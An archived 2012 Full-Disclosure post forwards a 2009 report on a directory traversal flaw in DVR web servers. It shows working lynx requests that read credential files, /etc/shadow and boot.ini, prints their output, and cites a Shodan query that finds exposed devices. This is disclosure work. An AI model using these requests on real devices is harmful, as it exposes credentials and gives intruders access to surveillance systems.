lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 8 Feb 2012 03:21:54 -0600
From: Jason Ellison <infotek@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: sales <sales@...etsystem.com>
Subject: Fwd: DVR Security Issue

I tried to report this to the vendor in 2009.  SHODAN "OwnServer1.0":
Results 1 - 10 of about 11832 for OwnServer1.0 country:US.

-Jason Ellison

---------- Forwarded message ----------
From: Jason Ellison <infotek@...il.com>
Date: Fri, Apr 10, 2009 at 5:02 PM
Subject: DVR Security Issue
To: sales@...etsystem.com

Hello,

  I am a I.T. consultant in the U.S.  I have
discovered a security flaw in your product.  Please forward to the
appropriate person in your company (software engineer maybe?).

Tibetsystem DVR security issue:

Your Windows and Linux based DVR use the same webserver,
"OwnServer1.0"... This web server has a directory traversal
vulnerability that was discovered in 2004.  This can be used to get
the usernames and passwords of the DVR (or any local file).  The
usernames and passwords are Hex encoded ASCII.

In addition to this the webapp delivers the complete server config
including ALL valid usernames and passwords if you give proper
authentication.  So if I login using default anonymous:blank, all
accounts and passwords are delivered in clear text.

Is there an update for this issue?

$ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini
[@Sdvr]
validate=1

[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

[users]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF


$ lynx -source http://a.b.c.d/../../windows/dvr2.ini
[generic]
encoder=0
dual_streaming=1
[dfs3]
current_path=E:\dfs
recycle=1
retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
record_path=F:\dfs;E:\dfs;
[Viewer]
run=C:\dvr\remote.exe,5.5.0.0
setup=C:\dvr\client\clientinstall.exe,5.5.0.0
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[user32]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B


 lynx -source http://10.10.10.56/../../../../../../../etc/shadow
root:$1$q0HFBbpi$removed:13328:0:99999:7:::
bin:*:13328:0:99999:7:::
daemon:*:13328:0:99999:7:::
adm:*:13328:0:99999:7:::
lp:*:13328:0:99999:7:::
sync:*:13328:0:99999:7:::
shutdown:*:13328:0:99999:7:::
halt:*:13328:0:99999:7:::
mail:*:13328:0:99999:7:::
news:*:13328:0:99999:7:::
uucp:*:13328:0:99999:7:::
operator:*:13328:0:99999:7:::
games:*:13328:0:99999:7:::
nobody:*:13328:0:99999:7:::
rpm:!!:13328::::::
messagebus:!!:13328::::::
haldaemon:!!:13328::::::
vcsa:!!:13328::::::
xfs:!!:13328::::::
rpc:!!:13328::::::
rpcuser:!!:13328::::::
clamav:!!:13328::::::
sshd:!!:13328::::::
quess:$1$tpvrlLSt$removed:13328:0:99999:7:::


$ lynx -source http://a.b.c.d/../../boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
Edition" /noexecute=optin /fastdetect


http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html
OwnServer 1.0 Directory Transversal Vulnerability

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ